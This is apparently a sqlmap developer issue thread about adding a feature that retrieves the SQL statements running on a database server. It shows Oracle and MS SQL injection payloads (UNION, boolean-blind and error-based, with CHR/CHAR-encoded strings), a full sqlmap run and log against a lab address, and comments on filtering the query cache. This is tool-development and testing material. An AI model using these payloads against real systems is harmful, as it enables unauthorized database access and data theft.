[*] SELECT * FROM scott.users WHERE id=1 UNION ALL SELECT NULL,CHR(113)||CHR(120)||CHR(118)||CHR(120)||CHR(113)||CHR(71)||CHR(66)||CHR(118)||CHR(99)||CHR(72)||CHR(122)||CHR(97)||CHR(76)||CHR(74)||CHR(109)||CHR(113)||CHR(122)||CHR(98)||CHR(118)||CHR(113),NULL FROM DUAL-- 
[*] SELECT * FROM scott.users WHERE id=1 UNION ALL SELECT NULL,CHR(113)||CHR(122)||CHR(113)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (1064=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1064) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(122)||CHR(112)||CHR(113),NULL FROM DUAL-- 

...

Microsoft SQL Server:

python sqlmap.py -u "http://172.16.93.132/sqlmap/mssql/iis/get_int.asp?id=1" -z "ign,flu,bat,tec=BEU" --sql-query='SELECT st.text from sys.dm_exec_cached_plans cp cross apply sys.dm_exec_sql_text(cp.plan_handle) st'
[11:52:35] [WARNING] detected ambiguity (mnemonic 'ign' can be resolved to: 'ignore-401', 'ignore-proxy'). Resolved to shortest of those ('ignore-401')
         _
 ___ ___| |_____ ___ ___  {1.0-dev-03f32ae}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:52:35

[11:52:35] [INFO] flushing session file
[11:52:35] [INFO] testing connection to the target URL
[11:52:35] [INFO] heuristics detected web page charset 'ascii'
[11:52:35] [INFO] testing if the target URL is stable. This can take a couple of seconds
[11:52:36] [INFO] target URL is stable
[11:52:36] [INFO] testing if GET parameter 'id' is dynamic
[11:52:36] [INFO] confirming that GET parameter 'id' is dynamic
[11:52:36] [INFO] GET parameter 'id' is dynamic
[11:52:36] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'Microsoft SQL Server')
[11:52:36] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1) values? [Y/n] Y
[11:52:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:52:36] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[11:52:36] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[11:52:36] [INFO] GET parameter 'id' is 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' injectable 
[11:52:36] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:52:36] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:52:36] [WARNING] reflective value(s) found and filtering out
[11:52:36] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:52:36] [INFO] target URL appears to have 3 columns in query
[11:52:36] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 15 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 8545=8545

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=1 AND 3918=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(118)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (3918=3918) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(107)+CHAR(122)+CHAR(113)))

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT CHAR(113)+CHAR(118)+CHAR(118)+CHAR(98)+CHAR(113)+CHAR(121)+CHAR(89)+CHAR(117)+CHAR(118)+CHAR(87)+CHAR(79)+CHAR(122)+CHAR(85)+CHAR(87)+CHAR(115)+CHAR(113)+CHAR(118)+CHAR(107)+CHAR(122)+CHAR(113),NULL,NULL-- 
---
[11:52:36] [INFO] testing Microsoft SQL Server
[11:52:37] [INFO] confirming Microsoft SQL Server
[11:52:37] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows XP
web application technology: ASP, Microsoft IIS 5.1
back-end DBMS: Microsoft SQL Server 2005
[11:52:37] [INFO] fetching SQL SELECT statement query output: 'SELECT st.text from sys.dm_exec_cached_plans cp cross apply sys.dm_exec_sql_text(cp.plan_handle) st'
[11:52:37] [INFO] the SQL query used returns 1341 entries
[11:52:37] [INFO] retrieved: "\\r\\ncreate+view+sys.dm_exec_cached_plans+as+select+*+from+OpenRowset(TABLE+SYSDMEXECCACHEDPLANS)\\r\\n"
[11:52:37] [INFO] retrieved: "(@1+smallint)SELECT+*+FROM+[users]+WHERE+[id]=@1"
[11:52:37] [INFO] retrieved: "(@1+tinyint)SELECT+*+FROM+[users]+WHERE+[id]=@1+AND+host_name()=host_name()"
[11:52:37] [INFO] retrieved: "(@1+tinyint)SELECT+*+FROM+[users]+WHERE+[id]=@1+AND+host_name()=host_name()"
[11:52:37] [INFO] retrieved: "(@1+tinyint)SELECT+*+FROM+[users]+WHERE+[id]=@1+AND+host_name()=host_name()"
[11:52:37] [INFO] retrieved: "(@1+tinyint)SELECT+*+FROM+[users]+WHERE+[id]=@1+ORDER+BY+(1)+ASC"
[11:52:37] [INFO] retrieved: "(@1+tinyint)SELECT+*+FROM+[users]+WHERE+[id]=@1+ORDER+BY+(3)+ASC"
[11:52:37] [INFO] retrieved: "(@1+tinyint,@2+int,@3+int)SELECT+*+FROM+[users]+WHERE+[id]=@1+AND+square(@2)=square(@3)"
[11:52:38] [INFO] retrieved: "CREATE+FUNCTION+sys.dm_exec_sql_text(@handle+varbinary(64))\\r\\nRETURNS+TABLE\\r\\nAS\\r\\n\\tRETURN+SELECT+*+FROM+OPENROWSET(TABLE+FNGETSQL,+@handle)\\r\\n"
[11:52:38] [INFO] retrieved: "CREATE+VIEW+sys.syscharsets+AS\\r\\n\\tSELECT+type,+id,+csid,\\r\\n\\t\\tconvert(smallint,+0)+AS+status,\\r\\n\\t\\tname,+description,\\r\\n\\t\\tconvert(varbinary(6000),+null)+AS+binarydefinition,\\r\\n\...
[11:52:38] [INFO] retrieved: "FETCH+API_CURSOR0000000000000002."
[11:52:38] [INFO] retrieved: "FETCH+API_CURSOR0000000000000004."
[11:52:38] [INFO] retrieved: "FETCH+API_CURSOR0000000000000006."
[11:52:38] [INFO] retrieved: "FETCH+API_CURSOR0000000000000007."
[11:52:38] [INFO] retrieved: "FETCH+API_CURSOR0000000000000008."
[11:52:38] [INFO] retrieved: "FETCH+API_CURSOR000000000000000B."
[11:52:39] [INFO] retrieved: "FETCH+API_CURSOR000000000000000C."
[11:52:39] [INFO] retrieved: "FETCH+API_CURSOR000000000000000D."
[11:52:39] [INFO] retrieved: "FETCH+API_CURSOR000000000000000E."
[11:52:39] [INFO] retrieved: "FETCH+API_CURSOR000000000000000F."
[11:52:39] [INFO] retrieved: "FETCH+API_CURSOR0000000000000010."
[11:52:39] [INFO] retrieved: "FETCH+API_CURSOR0000000000000012."
[11:52:40] [INFO] retrieved: "FETCH+API_CURSOR0000000000000014."
[11:52:40] [INFO] retrieved: "FETCH+API_CURSOR0000000000000015."
[11:52:40] [INFO] retrieved: "FETCH+API_CURSOR0000000000000016."
[11:52:40] [INFO] retrieved: "FETCH+API_CURSOR000000000000001B."

...

[dodek]

Appologies for the delay. It looks like because the Oracle and MS SQL versions access tables that contain all of the SQL Statements that it's trying to return them all.

One way that I combatted this was to do things like 'select top 1 * from querycachetable where querytext like '%somerandomvalue%' ' etc and order by length of the querytext field to get the first query executed when SQLMap confirms the page exists.

Another method I tried was to to exclude the cache tables from the query so something like

select top 1 * from querycachetable where querytext not like %'querycachetable%' and querytext like '%somerandomvalue%'

Postgres and mysql are easier because there is only one row generally in those locations so some form of top 1 / limit needs to be applied along with a where clause to narrow down the results to one that's ours but also that doesn't change with each request from sqlmap.

Hope this helps.

[stamparm]

--statements Retrieve SQL statements being run on DBMS